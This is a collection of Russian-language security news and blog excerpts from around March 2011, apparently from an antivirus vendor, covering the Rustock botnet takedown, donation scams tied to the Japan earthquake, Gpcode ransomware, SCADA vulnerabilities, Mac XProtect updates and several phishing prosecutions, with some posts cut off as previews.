В первой половине марта спам-фильтры MessageLabs ежедневно отсеивали в среднем 52 млрд. мусорных сообщений. После отключения командных серверов Rustock суточная норма спама сократилась на треть.

По данным MessageLabs, накануне скоординированной акции вклад этой зомби-сети в спам-трафик, генерируемый ботами, составлял порядка 28,5%, что эквивалентно 13,82 млрд. сообщений в сутки. Численность Rustock эксперты оценили в 470-690 тыс. зараженных машин, 11% которых находятся на территории США, 9% ― в Индии, 6% в России. Пока не ясно, смогут ли оправиться от удара владельцы крупнейшего ботнета-спамера, пережившего многих конкурентов. Если их удастся призвать к ответу, ― а Microsoft, похоже, уже нашла нужный след ― Rustock не суждено вновь проявить себя на спам-арене. Его место займут соперники, до сих пор державшиеся в тени могучего фаворита.

По мнению экспертов, в настоящее время наиболее перспективным претендентом в этом отношении является Bagle. В конце прошлого года он не входил даже в ведущую десятку сетей-спамеров, а уже к середине марта устойчиво генерировал 17,2% почтового мусора, распространяемого автоматизированными средствами. Как и Rustock, этот ботнет специализируется на продвижении нелицензированных интернет-аптек, но его возможности пока гораздо скромнее. По оценке MessageLabs, в составе Bagle функционируют 180-280 тыс. зомби-машин, совокупная производительность которых составляет около 8,31 млрд. сообщений в сутки. 22% спамботов Bagle нашли приют в России, 8% ― в Индии, 7% в Колумбии.

В компанию Sunbelt (теперь в составе GFI Software) переслали образец не совсем обычного «нигерийского» письма: мошенники просят направлять ответ не на деревню неведомому дедушке, а на действующий адрес реальной организации. Однако чтобы управлять последующими действиями потенциальной жертвы, ей предлагают «для верности» отсылать копии писем на альтернативный адрес ― на сей раз подставной.

Скам-сообщение написано от имени британского общества Красного Креста и в строке From: содержит правильный адрес этой организации. Текст письма содержит призыв оказать финансовую поддержку японцам, пострадавшим от цунами. Пожертвования в размере менее 10 тыс. долларов мошенники просят направлять переводом Western Union (!), более крупные ― вносить на специальный банковский счет. Получателю предлагают сделать свой выбор и сообщить полное имя и номер телефона для получения дальнейших инструкций. Если он ничем не может помочь страждущим, письмо рекомендуется размножить, используя контакты из адресной книги (т.е. подсобить мошенникам со спам-рассылками).

Зачем посылать копии писем на запасной адрес? ― У злоумышленников и на это есть ответ: разумеется, на случай, если защитный фильтр организации заблокирует входящий оригинал как спам! Если получатель отреагирует на приманку «нигерийцев» и вступит с ними в переписку, он не скоро получит разъяснения от Красного Креста по поводу своих денежных переводов. У благотворительных организаций сейчас горячее время, и мошенники успеют досуха выжать карманы сердобольных пользователей, утративших бдительность.

На прошлой неделе Твиттер отметил свое 5-летие. За время, прошедшее с его появления в июле 2006 года, Твиттер с его 140 символами стал неотъемлемой частью повседневной жизни многих людей. Также Твиттер стал местом проведения множества массовых вредоносных атак — и по сей день успешно используется киберпреступниками.

Проблемы с безопасностью в Твиттере имеют богатую историю, несмотря на его относительно «молодой» возраст. Каких только атак не было в этой сети: и эксплуатация наиболее популярных тем, и взлом паролей администраторов, и захват пользовательских аккаунтов... Продолжать можно долго. Популярность Твиттера и постоянные проколы в его безопасности стали причиной того, что в 2010 году Федеральная комиссия по торговле выдвинула против Твиттера обвинения. В результате Твиттеру пришлось ввести в действие новые политики безопасности, предусматривающие такие средства защиты, как использование по умолчанию SSL-соединений и поддержка OAUTH для сторонних веб-приложений.

Некоторое время назад мы опубликовали блогпост о спам-рассылке, авторы которой использовали новости о недавнем землетрясении в Японии для заражения компьютеров пользователей. Этот пост — продолжение предыдущего, и в нем мы расскажем о примененных злоумышленниками эксплойтах.

Как показал проведенный нами анализ, вредоносные ссылки в спам-сообщениях ведут на сайты, где размещен набор эксплойтов Incognito.

Вот интересная картинка с серверов, на которых хостится набор эксплойтов:

Ниже приведен пример письма из этой спам-рассылки — оно выглядит как сообщение от социальной сети Twitter:

Письмо выглядит как сообщение службы поддержки Twitter («Twitter Support Message») о том, что у пользователя 6 непрочитанных сообщений.

Кроме того, получателю письма предлагается пройти по ссылке, которая якобы ведет на видеоролик о ситуации в запретной зоне атомной электростанции в Фукусиме.

Пройдя по ссылке, пользователь после переадресации попадает на вредоносный веб-сайт, подобный тем, о которых мы писали ранее. Давайте посмотрим, какие эксплойты используются для установки вредоносного кода — различных вариантов троянца-загрузчика Trojan-Downloader.Win32.Codecpack.

Мы внимательно наблюдаем за вредоносными страницами. За 40 часов вредоносные домены, на которых размещены эксплойты, менялись восемь раз. Злоумышленники по-прежнему пытаются заразить пользователей.

В ноябре 2010 мы опубликовали блогпост о новой разновидности программы-вымогателя Gpcode.

Сегодня «Лаборатория Касперского» обнаружила новый вариант зловреда в виде обфусцированного выполняемого файла. Дальнейшая информация доступна в техническом описании. Благодаря Kaspersky Security Network, угроза была автоматически обнаружена как UDS:DangerousObject.Multi.Generic.

Было добавлено специфическое детектирование; теперь зловред распознается как Trojan-Ransom.Win32.Gpcode.bn.

Заражение происходит при посещении вредоносного сайта (drive-by загрузка).

После выполнения GPCode генерирует 256-битовый ключ для алгоритма шифрования AES, используя Windows Crypto API, и шифрует его с помощью публичного RSA 1024 ключа киберпреступника. Зашифрованный результат будет сброшен на рабочий стол зараженного компьютера внутри текстового файла с требованием выкупа:

Важно заметить, что в отличие от образца ноября прошлого года, программа требует отправить выкуп платежом при помощи предоплаченных карт Ukash. Кстати, 24 марта мы обнаружили ransomware-программу, которая маскировалась под сообщение от полиции ФРГ — этот вымогатель также требовал провести платеж картой Ukash.

Похоже, киберпреступники уходят от старых добрых денежных переводов, предпочитая платежи предоплаченными картами. Сумма выкупа с ноября увеличилась с 120 до 125 долларов.

С тех пор как в прошлом году героем новостей стал Stuxnet, возник повышенный интерес к системам промышленного мониторинга (ICS, industrial control systems). Об этом свидетельствует и то, что сейчас мы наблюдаем в открытом доступе всплеск 0-day (незакрытых) уязвимостей и эксплойтов.

В начале этой недели мы обнаружили как минимум 34 незакрытых уязвимости, помещенных на Bugtraq. В статье, опубликованной на The Register, упоминается также пакет эксплойтов для систем SCADA, который сейчас предлагается для продажи пентестерам (сокр. от penetration test).

Я против полного раскрытия, но эти события ясно показывают, что существует устойчивый интерес к системам, которые отвечают за объекты жизнеобеспечения — от светофоров до электроэнергетических систем и систем контроля аэропортов.

В этой области есть несколько весьма интересных моментов. Самое главное в ICS/SCADA — надежность/время безотказной работы, а безопасность оказывается на втором плане.

Существуют компании, оборудование которых непрерывно работает более 28 лет. Это означает, что они пользуются операционными системами, созданными лет 30 назад. Это также значит, что, если ничего не случится, то пройдет еще пара десятков лет, прежде чем будут внесены какие-то серьезные изменения в систему безопасности.

Системы промышленного мониторинга находятся прямо на стыке частного и государственного пользования. Объектами жизнеобеспечения управляют компании, которые обслуживают население. И именно контроль со стороны государства заставляет многие эти компании серьезно заниматься вопросами безопасности.

Правительства не всегда оперативны в решении вопросов, но все же главный посыл к работе над усилением безопасности ICS/SCADA должен исходить от них.

Надеюсь, освещение в СМИ вопросов, касающихся уязвимостей, поможет решению проблемы.

«Последний выходной день прошел отлично: было тепло и светило солнце, поэтому мы весь день гуляли с друзьями, радуясь наступающей весне. Вдобавок, придя домой, я обнаружил в почтовом ящике письмо от интернет-магазина, где я регулярно покупаю одежду и обувь. В нем меня поздравили и сообщили, что я могу получить бесплатную дисконтную карту. Отличное завершение дня!»

Наверное, приблизительно такое сообщение я бы хотел опубликовать в блог. Однако в конце марта в России холодно и ветрено, а за «бесплатными дисконтными картами» зачастую скрываются угрозы безопасности.

Трое калифорнийцев и два жителя Лас-Вегаса признаны соучастниками масштабной фишинговой схемы, реализация которой принесла исполнителям свыше 1 млн. долларов.

Обвиняемые проходят по делу интернациональной группировки, возбужденному в Лос-Анджелесе осенью 2009 года. Судебные расследования в отношении 53 американцев и 47 египтян были начаты в обеих странах по итогам межнациональной операции, проведенной правоохранительными органами США и АРЕ. Согласно материалам дела, фишинговыми рассылками и сбором банковских реквизитов занимались сообщники, проживавшие в Египте. Отъем денежных средств со счетов жертв фишинга и дележ осуществляла американская сторона. По предварительным оценкам, от действий данной группировки пострадали около 5 тыс. клиентов Bank of America и Wells Fargo.

Четверо из тех, кому только что был вынесен обвинительный вердикт, ― «дропы», которые принимали краденые деньги на свои счета и обналичивали их. Пятый ответчик, Николь Мишель Мерци (Nichole Michelle Merzi), вместе с двумя другими главарями руководила вербовкой агентов по отмыванию денег и всеми финансовыми операциями. Оба ее «коллеги» уже признали свою вину и ждут окончательного приговора, который будет вынесен в июне. Судьба Мерци и ее четверых наемников будет решена 31 октября. «Дропам» грозит до 30 лет тюремного заключения, главарям не менее двух лет надбавки к любому сроку, который назначит суд.

Apple выпустил MacOS X 10.6.7, в котором исправлено несколько багов и включено несколько обновлений для системы безопасности. В патч также включено «тихое» обновление Xprotect — антивирусного продукта Apple.

Xprotect

Вместе с выпуском операционной системы Snow Leopard (Mac OS X 10.6) Apple выпустил продукт под названием „XProtect“, обеспечивающий базовую антивирусную защиту. Он сканирует и обнаруживает угрозы при закачке файлов для последующего выполнения через Safari, Mail, iChat, Firefox и несколько других браузеров. Сигнатурный список обновляется через Apples Software Update.

До сих пор база данных Xprotects содержала сигнатуры трех известных угроз:

- OSX.RSPlug.A: изменяет местные DNS-записи, распространяется через видео-кодеки
- OSX.Iservice: атакует веб-сайты (DDoS), распространяется в комплекте с пиратскими приложениями
- OSX.HellRTS: известен как HellRaiser; инструмент, предоставляющий атакующему полный контроль над системой-жертвой. Версия 4.2
общедоступна, версия 4.4 продается создателем за $15 на подпольных форумах.

Новое обновление

Обновленная сигнатура теперь содержит определения для “OSX.OpinionSpy“. Этот троянец распространялся в середине 2010 в комплекте со скринсейверами и приложениями, размещенными для скачивания на популярных сайтах с продуктами для Mac. Известен как Opinion Spy и Premier Opinion. Главная цель зловреда — сбор личных данных и их отправка на различные серверы. Троянец работает от имени администратора, т.е. на вашем компьютере он может сделать «что угодно».

При выполнении инсталлятор (который идет в комплекте с OpinionSpy) просит пароль администратора, что вполне обычно при установке программ. Введя пароль, пользователь предоставляет троянцу полный доступ к системе. OpinionSpy также делает инъекции кода в Safari, Firefox и iChat, чтобы собрать больше личных данных.

Продукты «Лаборатории Касперского» детектируют данную угрозу со 2 июня 2010 года как Trojan.OSX.Spynion.a. В этом году мы через KSN получили 13 пользовательских отчета, в основном из Индии.

В то время как сигнатурный список Apple растет, пользователям Mac следует уделять повышенное внимание безопасности и вредоносным программам.

В компании FireEye зафиксировали любопытное совпадение: на следующий день после свержения Rustock замолчали командные серверы ботнета Harnig.

Harnig, он же Piptea, ― PPI-зловред, единственным назначением которого после внедрения в систему является загрузка и запуск других вредоносных приложений. Владельцы ботнета, созданного на его основе, получают определенную мзду от заказчиков за каждую успешную инсталляцию. По свидетельству FireEye, последние пару лет Harnig и Rustock демонстрировали весьма устойчивый симбиоз. При этом установка Rustock на зараженную машину осуществлялась в два этапа: Harnig закачивал специализированный инсталлятор заказчика, а тот подгружал спамбот. По наблюдениям экспертов, операторы ботнета-спамера крайне редко меняли партнера и практически не использовали альтернативные способы расширения своих владений.

Отключение центров управления Rustock произошло 16 марта. На следующий день в FireEye отметили, что Harnig провел загрузку разных зловредных программ на зараженные машины, включая ZeuS и SpyEye. Rustock среди них уже не было. После этого все C&C серверы Harnig разом перестали обслуживать запросы подопечных зомби-машин (при обращении выдавали ошибку 404). Насколько известно, никаких усилий по ликвидации этого ботнета не предпринималось. По данным FireEye, командные серверы Harnig размещены в разных регионах, хотя 45% из них находятся на территории России, а 26% ― в США. Отключить их разом непросто, это не Rustock, у которого 95% C&C хостились на территории одной страны (США), которая к тому же имеет адекватную правовую базу и опыт в противостоянии ботоводам.

Тем не менее, вполне возможно, что PPI-распространители Rustock просто запаниковали: кому охота попасть под раздачу! ― и решили приостановить свою противозаконную деятельность, переждать, пока страсти улягутся. В таком случае Harnig через короткое время вновь оживет, и не исключено, что одним из его новых «подарков» владельцам зараженных машин станет обновленный Rustock.

Согласно результатам опроса, проведенного Ponemon Institute по заказу AVG Technologies, девять десятых держателей смартфонов в США никогда не задумывались о том, что могут собственноручно загрузить на свое устройство зловреда. Более того, они даже не в курсе, что конфиденциальная информация может быть автоматически отослана со смартфона без ведома владельца.

В опросе приняли участие 734 американца старше 17 лет. 84% из них используют смартфон как в личных целях, так и для решения деловых вопросов. Две трети респондентов указали, что хранят на мобильном устройстве солидное количество информации личного характера. 37% закачали на смартфон рабочие документы, предназначенные для внутреннего пользования, 29% записали реквизиты банковских карт. Более 80% участников опроса заходят с помощью смартфона на почтовые сервисы, в том числе в корпоративную почту. 44% посещают интернет-магазины, 40% ― социальные сети; 38% проводят платежи, 14% пользуются услугами банков.

Как показало исследование [PDF 1,41 Мб], 60% владельцев смартфонов осознают, что неосмотрительное поведение при веб-серфинге и шопинге может привлечь массу непрошеной рекламы. Половина отдают себе отчет в том, что использование одного и того же устройства для личных и деловых нужд чревато неприятными для бизнеса утечками. Более трети знают, что выход в интернет с незащищенной точки беспроводного доступа может привести к заражению.

В то же время для 89% респондентов было откровением, что установленные на смартфон вредоносные приложения умеют самовольно и скрытно передавать конфиденциальные данные своим хозяевам. 91% участников опроса даже не подозревали, что вместе с нужной программой или вместо нее можно скачать зловреда, работающего на мобильных платформах, ― банковского троянца, шпиона или автодозвонщика, использующего премиум-сервисы. Больше половины опрошенных, покидая социальную сеть, пренебрегают специальной кнопкой завершения сеанса и тем самым предоставляют злоумышленникам возможность бесконтрольного доступа к своему профилю.

Судя по результатам опроса, владельцы смартфонов хранят на этих устройствах достаточно важной информации, потеря которой может обернуться финансовыми убытками. В то же время лишь 43% участников опроса заявили, что при выборе модели смартфона принимают во внимание степень ее защищенности. Менее половины пользуются блокировкой клавиатуры и паролями, лишь 29% задумались о перспективе установки специального антивируса. Хотя 12% респондентов уже сталкивались со случаями мошенничества в мобильном сервисе, половина держателей смартфонов признались, что никогда не проверяют счета, выставляемые оператором сотовой связи. 6% производят проверку раз месяц, 8% ― лишь тогда, когда счет подозрительно велик.

Исследователи полагают, что пренебрежение правилами безопасной эксплуатации смартфонов и средствами их защиты отчасти вызвано дефицитом просветительских публикаций. Кроме того, бытует ошибочное представление, что, если многофункциональное мобильное устройство используется, в основном, для телефонной связи и доступа к каналам электронной почты, риск потерять хранящуюся в нем информацию минимален.

Новость о кончине Элизабет Тейлор уже вовсю используется мошенниками для социального инжиниринга на Твиттере. Вот один из примеров сообщения в Твиттере: «Загрузить фильмы Легенда кино Элизабет Тейлор скончалась в возрасте 79 лет».

Статистика сервиса Bit.ly показывает, что с ноября 2010 года эта же короткая ссылка неоднократно использовалась в измененном виде в различных мошеннических схемах для накрутки трафика (pay per traffic). Все они были связаны с одной и той же партнерской программой.

В прошлые выходные многие пользователи социальной сети Facebook стали получать от своих друзей вредоносные сообщения в чате. Вот как выглядели сообщения:

“Father crashes and dies because of THIS message posted on his daughters profile wall!” («Отец разбился и умер из-за ЭТОГО сообщения, размещенного на стене дочери») — затем следует сокращенная (с помощью сервиса bit.ly) ссылка. В слове daughter's не хватает апострофа — должно быть «his daughter’s profile wall». Это признак того, что автор сообщения — не тот, за кого себя выдает, или, во всяком случае, что английский — не его родной язык. Давайте посмотрим, каковы последствия для пользователя, «клюнувшего» на этот трюк социальной инженерии.

После отключения от Сети центров управления Rustock среднесуточное количество спама, регистрируемого экспертами IBM, сократилось на 35-40%.

Судя по тому, что спад продолжается уже несколько дней, это не обычная флуктуация. В IBM полагают, что причина все-таки кроется в уходе этого ботнета со спам-арены. Такая же картина наблюдалась в конце декабря, хотя в тот раз изменения были намного более ощутимыми.

Любопытно, что за пару дней распределение мест в рейтинге стран-источников спама тоже поменялось. США, которые до падения Rustock занимали, согласно статистике IBM, второе место, опустились на 15-ю позицию. Потоки нелегитимных писем из этой страны сократились на 74%. Заметно меньше спама стали рассылать израильские и британские зомби-машины ― на 66 и 54% соответственно. Во Вьетнаме и Южной Корее, напротив, ситуация практически не изменилась.

Аналогичное снижение спам-активности, совпавшее по времени с ликвидацией C&C Rustock, зафиксировала также MessageLabs. Commtouch никаких отклонений от глобальной нормы не обнаружила, как и M86 Security. В ЛК особого сокращения спама тоже не наблюдают. Маловероятно, чтобы участник спам-трафика, вклад которого в последнее время составлял, по данным M86, лишь 2,9%, оказался способным громко заявить о своем уходе.

Это в прошлом году, когда Rustock генерировал половину почтового мусора, перебои в его работе мгновенно сказывались на общей статистике по спаму. В начале октября с закрытием «партнерки» SpamIt выход с этого ботнета заметно снизился, так как он обслуживал, в основном, фармаспамеров, участвующих в данной программе. Тем не менее, когда операторы Rustock решили устроить себе рождественские каникулы, глобальные потоки мусора тоже резко уменьшились. В середине января Rustock ожил, и спам в Сети сразу удвоился. Его уже начали обходить более удачливые конкуренты, но в начале текущего года вклад Rustock в общий спам-трафик все еще был значительным ― 17,5%. Неизвестно, как бы дальше сложилась карьера этого крупнейшего ботнета-спамера, если бы не вмешательство Microsoft. Скорее всего, его операторы приступили бы к реорганизации сети с обновлением спамбота, как это уже не единожды случалось, и занялись поиском новых заказчиков и арендаторов.

Недавно, просматривая мою новостную ленту в социальной сети «ВКонтакте», я обнаружил интересный статус у одного из моих друзей — «попробуй новые стили ВКонтакте». Статус содержал ссылку. Мне все это показалось странным, и я решил проверить, что же находится по URL.

Перейдя по ссылке, я оказался на сайте durov-stil.co.cc, где посетителям предлагалось выбрать «новый стиль» для оформления своей страницы на сайте ВКонтакте.

Фрагмент главной страницы сайта durov-stil.co.cc

Дизайн сайта был скопирован с сайта ВКонтакте, но его адрес начинался не с vkontakte.ru, а с совершенно постороннего домена, а все кнопки в левой части окна вели на одну и ту же страницу. Я решил разобраться, зачем кому-то понадобилась эта подделка.

Я выбрал одну из предлагаемых тем для оформления, и на экране сразу же появилось окно с предложением ввести логин и пароль от аккаунта социальной сети «ВКонтакте».

Мое личное отношение к червю Slammer (Helkern) имеет давнюю историю. 25 января 2003 года состоялось мое первое «боевое крещение» в роли вирусного аналитика ЛК. Это был выходной день, и задача в одиночку дежурить на входящем потоке подозрительных файлов была возложена на меня, на тот момент работавшего в компании чуть более месяца.

В тот день интернет столкнулся с одной из самых грандиозных вирусных эпидемий за всю историю – червь, использовавший уязвимость в MS SQL Server, заразил несколько сотен тысяч компьютеров по всему миру всего лишь за пятнадцать минут и на несколько часов отключил от Сети Южную Корею.

Те 376 байт оказались реализацией так называемого «бестелесного» вируса, который не создает своих копий в системе и живет исключительно в оперативной памяти.

С тех пор прошло уже больше 8 лет, но, несмотря на это, Slammer продолжал жить в интернете и постоянно занимал первые строчки в отчетах по сетевым атакам. Миллионы и миллиарды вредоносных пакетов продолжали рассылаться каждый день, ища жертв и генерируя значительный объем мусорного трафика.

9 марта 2011 года произошло нечто пока необъяснимое. Наша система автоматического анализа угроз Kaspersky Security Network зафиксировала значительное снижение числа атакующих и еще более значительное - атакуемых станций. Данная статистика поступает к нам от модуля IDS (intrusion detection system), призванного отражать сетевые атаки. В ходе работы системы также производится определение источника атаки.

Давайте посмотрим на этот график:

В США арестован организатор мошеннической схемы, которого обвиняют в махинациях с ценными бумагами и рассылке спама.

Согласно обвинительному акту [PDF 780 Кб], 42-летний техасец Кристофер Рэд (Christopher Rad) возглавлял интернациональную группировку, которая больше года грабила американских инвесторов, обманом вынуждая их покупать неликвидные акции. Аферисты заранее приобретали эти акции у безвестных компаний, искусственно вздували цены, а затем, до падения курса, продавали весь пакет с большой выгодой для себя. Такая мошенническая схема известна как «накачка-сброс» (pump-and-dump).

Для имитации повышенного спроса сообщники взламывали брокерские аккаунты, от имени их владельцев приобретали часть безнадежных акций и устраивали оживленные торги. Чтобы снять ограничение на куплю-продажу ценных бумаг, мошенники подделывали документы об истинном состоянии дел в продвигаемых компаниях. Большую роль в фальшивой рекламной акции играли спам-рассылки. Фальсифицированные заявления, распространяемые большим тиражом, помогали привлечь внимание потенциальных инвесторов к искусственно созданному рынку и убедить их в перспективности капиталовложений.

Наймом спамеров занимался соотечественник и сверстник Рэда, проживавший в Тайланде, ― небезызвестный Джеймс Брэгг (James Bragg). Брэгг приобрел богатый опыт в таких делах, сотрудничая с вожаком аналогичной группировки Аланом Ральски (Alan Ralsky). В далекой России быстро отыскались ботовод и хакер, которые за определенную мзду согласились оказать помощь зарубежным «коллегам». Эти соучастники фигурируют в следственных материалах под инициалами «D.S.» и «B.T.».

Теперь ключевым фигурантам очередного дела о «биржевом» мошенничестве придется отвечать за свои прегрешения по всей строгости закона. И Рэду, и Брэггу, который уже сознался в содеянном, грозит до 5 лет тюремного заключения и до 250 тыс. долларов штрафа.

Как многие и предполагали, мошеннические сообщения с просьбами о пожертвованиях для пострадавших в Японии появляются в ящиках пользователей. Подробно изучив одно из таких сообщений, мы обнаружили следующее:

Это сообщение было отправлено с канадского IP-адреса через почтовый сервер, расположенный в Испании. В полях «От» и «Ответить» отображается японский почтовый адрес, скорее всего, фальшивый, а в самом письме в качестве получателя денежных средств, переводимых через Western Union, указано имя «Sasiki Nakatawo», крайне необычное, если вообще не выдуманное. Потенциальных жертв просят переслать их данные и контрольный номер денежного перевода на почтовый адрес в Гонконге. Кстати, сообщения были созданы в мейлере с использованием набора символов "Windows-1251" (Cyrillic).

Как видим, в этой схеме присутствуют несколько мест, расположенных по всему миру. Однако решения «Лаборатории Касперского», фильтрующие сообщения, помещают это мошенническое послание именно туда, куда следует — в папку «СПАМ».

По свидетельству экспертов из F-Secure, новый MitMo-троянец представляет собой компонент шпионской программы SpyEye.

Новый мобильный зловред атакует устройства на базе Symbian и ориентирован на кражу кодов mTAN, которые используются для аутентификации в системах онлайн-банкинга. Чтобы прописаться на зараженном смартфоне, он использует сертификат, выданный китайским веб-сайтом cer.opda.cn, который позволяет подписывать приложения при установке на конкретное устройство. Троянец также пытается заполучить у потенциальной жертвы международный идентификатор IMEI: перехватывает сеанс связи с системой онлайн-банкинга и на лету внедряет в страницу регистрации дополнительное поле для заполнения. В случае успеха вредоносный файл добавляется к списку разрешенных (подписанных) приложений на данном устройстве.

По всей видимости, авторы новой версии MitMo-троянца воспользовались доступностью сертификатов OPDA. Их можно получить бесплатно на сайте cer.opda.cn, для оформления заказа требуется лишь зарегистрироваться и ввести в специальную форму IMEI. Правда, в целях борьбы с злоупотреблениями с недавних пор порядок выдачи сертификатов на сайте изменился: сертификат выдается бесплатно лишь при первичном обращении, остальные приходится оплачивать. Однако не стоит забывать, что OPDA — не единственная организация, предоставляющая такие услуги.

Примечательно, что вирусописатели взяли за основу своего нового творения SpyEye. Все предыдущие MitMo-атаки ― в сентябре прошлого года, в феврале нынешнего ― проводились с использованием облегченных модификаций ZeuS.

Убедившись в успехе, Microsoft сочла возможным обнародовать, что прекращение спам-активности Rustock ― ее рук дело.

Падение потоков спама с этого ботнета и бездеятельность его C&C серверов отметили многие ― после того, как небезызвестный Брайан Кребс (Brian Krebs) привлек внимание интернет-общественности к этому факту. M86 Security и MessageLabs даже опубликовали актуальные графики, подтверждающие, что крупнейший ботнет-спамер резко впал в спячку. На тот момент причины этого явления были еще не известны, приходилось лишь гадать: это чья-то благотворительная акция или кратковременный перерыв в работе операторов зомби-сети, кои до сих пор возникали с заметной периодичностью.

Как теперь выяснилось, молчание Rustock ― следствие успешного завершения многомесячной спецоперации Microsoft, получившей кодовое наименование Операция b107. Используя свой недавний опыт по ликвидации ботнета Waledac, исследователи обратились за помощью к другим заинтересованным сторонам и подали судебный иск против операторов Rustock. Свидетельства о противоправной деятельности последних предоставили также специалисты по интернет-безопасности из FireEye, эксперты Вашингтонского университета и компания Pfizer, чей брэнд активно использовался спамерами, продвигающими контрафактные медикаменты с помощью данного ботнета. Иск Microsoft был удовлетворен, и компания приступила к планомерному уничтожению зомби-сети, заручившись поддержкой соответствующих интернет-провайдеров и зарубежных партнеров ― голландского подразделения по борьбе с высокотехнологичными преступлениями (Dutch High Tech Crime Unit) и китайской Группы быстрого реагирования на чрезвычайные ситуации в интернете (CN-CERT).

Совместными усилиями все центры управления Rustock были отключены от Сети. Руководствуясь судебным приказом, Microsoft захватила содержимое командных серверов, арендованных злоумышленниками у пяти американских хостинг-провайдеров. (По данным компании, некоторые из зарубежных арендаторов в качестве контактов предоставили азербайджанские адреса.) В настоящее время эксперты при поддержке зарубежных партнеров приступили к очистке резидентных спамботов, общее число которых, по некоторым оценкам, может составлять около 1 миллиона.

Специалистами «Лаборатории Касперского» была обнаружена рассылка спама, содержащего ссылки якобы на информацию о землетрясении в Японии. На самом деле «горячая» тема использовалась, чтобы заразить компьютеры пользователей.

14 марта Adobe опубликовала сообщение об уязвимости в Flash Player, позволяющей удаленное исполнение кода. Уязвимость также затрагивает Adobe Reader и Acrobat.

Этой критической уязвимости присвоен номер CVE-2011-0609.

Атаки, наблюдаемые в настоящее время, происходят через вредоносный SWF-файл, внедренный в файл Excel. Чтобы злоумышленники получили возможность эксплуатировать уязвимость в Flash Player, пользователь должен открыть вредоносный XLS-файл.

Такая структура является идеальной для проведения целевых атак. И действительно, сообщения о подобных атаках уже имеются.

Тестирование показало, что эксплойт не работает под Windows 7, в то время как под Windows XP он выполняется без проблем. Есть вероятность, что с помощью ROP-эксплойта эту уязвимость можно будет использовать и под Windows 7.

Считайте меня консерватором, но я не вижу смысла в возможности внедрения SWF-файлов в документы Excel. С моей точки зрения, это яркий пример того, как избыточный функционал продукта может привести к проблемам безопасности.

Было бы здорово, если бы компания Microsoft позволила пользователям отключать эти излишние функции. Либо, как вариант, Adobe могла бы запретить такое внедрение, чтобы ограничить возможности для проведения подобных атак.

Причина, по которой киберпреступники используют Excel в качестве средства доставки вредоносного кода, достаточно проста — это позволяет осуществить атаку по электронной почте. Так что будьте особенно осторожны, когда получаете в письмах XLS-файлы, которых вы не ждали.

Adobe выпустит патч на следующей неделе (21-25 марта). Патч к Reader X будет выпущен только 14 июня, поскольку, как сообщает Adobe, защищенный режим в данном продукте обеспечивает достаточный уровень безопасности.

Европейское агентство по сетевой и информационной безопасности (European Network and Information Security Agency, ENISA) подытожило накопленный опыт борьбы с ботнетами и представило рекомендации для правовых институтов, интернет-провайдеров, профессиональных исследователей и конечных пользователей.

Одним из важных вопросов, поднятых экспертами, является оценка потенциальной угрозы, которую представляет собой ботнет. Определить его истинные размеры редко удается из-за разницы в методиках обсчета. Да и сам по себе этот показатель не может служить адекватным мерилом опасности зомби-сетей, так как функционал зловредов, используемых для их построения, неодинаков. Иной раз скромный ботнет может нанести гораздо более ощутимый ущерб, чем совместные действия многих тысяч зараженных машин. Впрочем, очистка последних тоже обходится недешево.

Анализ технических, регуляторных и социальных мер противодействия ботоводам, а также национальных и межведомственных инициатив показал, что лишь долгосрочные акции, скоординированные на международном уровне, дают хорошие результаты. Борьба с ботнетами должна вестись по всем фронтам, включая нейтрализацию существующих зомби-сетей, профилактику заражений и снижение рентабельности использования этих инструментов киберкриминалом.

Успех противостояния возможен лишь при активном участии всех заинтересованных сторон. Правительствам надлежит привести в соответствие национальные законодательства, интернет-провайдерам ― усовершенствовать процесс обнаружения зараженных машин, оповещения их владельцев и оказания помощи в очистке ресурсов. Конечные пользователи должны осознать необходимость использования актуальных средств индивидуальной защиты, позволяющих снизить риск заражения и дальнейшего распространения инфекции. Ключевыми моментами в борьбе с ботнетами являются слаженное взаимодействие всех ее участников, оперативный информационный обмен и межгосударственное сотрудничество.

Как, возможно, знают давние читатели нашего блога, около трех лет назад я занялся проблемами компьютерных угроз по ту сторону Атлантики. С тех пор я не раз подмечал различия в том, как решаются вопросы безопасности в Европе и Америке.

Одна из областей, где эта разница прекрасно заметна, – это использование секретных вопросов в качестве дополнительной меры безопасности. В Европе секретные вопросы не в ходу, а в США они очень популярны.

Нечего и говорить, что аутентификация с применением альтернативных каналов связи, используемая многими европейскими банками, обеспечивает безопасность куда надежнее, чем секретный вопрос, задаваемый в дополнение к вводу обычного пароля. Банки – это лишь один из примеров. Секретные вопросы нынче можно встретить где угодно.

И вот наступила эра Facebook. Теперь нечасто найдешь секретный вопрос, ответ на который не был бы размещен на Facebook. Особенно плохо обстоит дело с сервисами, позволяющими восстанавливать забытые пароли, правильно ответив на один или несколько секретных вопросов.

За соучастие в дерзком ограблении платежной системы RBS WorldPay молодой предприниматель из Новосибирска приговорен к 2,5 годам лишения свободы условно, с компенсацией нанесенного ущерба.

Принять участие в многомиллионной «краже со взломом» Артему Тогочакову предложил его давний знакомый, примкнувший к хакерской группировке, ― Евгений Аникин. Тот вспомнил о своем школьном приятеле, когда вербовал «банкоматчиков» ― конечных исполнителей криминальной схемы, которые должны были с помощью фальшивых пластиковых карт за сутки обчистить все скомпрометированные счета.

Перед началом «операции» Тогочакову прислали ПИН-коды и вручили поддельные карты. В назначенный день он отправился в Кемерово и с двумя подручными снял 500 тыс. рублей через банкоматы, установленные в торговом центре. По уговору с Аникиным, налетчик должен был оставить себе половину, а остальные деньги сдать хакерам. Однако жадность взяла верх, Тогочаков стал жаловаться другу детства на непредвиденные расходы: его якобы выследила милиция, пришлось откупаться и заметать следы. Аникин в долгу не остался и на следствии выдал имя вероломного сообщника.

Тогочакова осудили по статье «кража, совершенная группой лиц по предварительному сговору, в крупном размере». Из украденного полумиллиона он уже вернул 100 тыс. рублей.

Уязвимость «off-by-one» (завышение/занижение на единицу) – это достаточно старая проблема. Вот перевод описания из английской версии Википедии:

Ошибка off-by-one (off-by-one error, OBOE) это логическая ошибка, возникающая при использовании дискретного эквивалента граничных условий. Подобные ошибки нередки в компьютерном программировании, когда цикл итерации повторяется на один раз больше или меньше, чем следует. Как правило, проблема возникает, если программист не учитывает, что последовательность начинается с нуля, а не с единицы (как, например, с индексами массивов в некоторых языках программирования) или ошибочно использует в сравнении «меньше или равно» вместо «меньше».

Подобные ошибки позволяют проводить DoS-атаки или даже выполнять произвольный код. В интернете есть множество ресурсов, на которых объясняется, как эксплуатировать «переполнение кучи на одну позицию» (“off-by-one heap overflow”).

Но почему «Ошибка на одну позицию 2.0»?

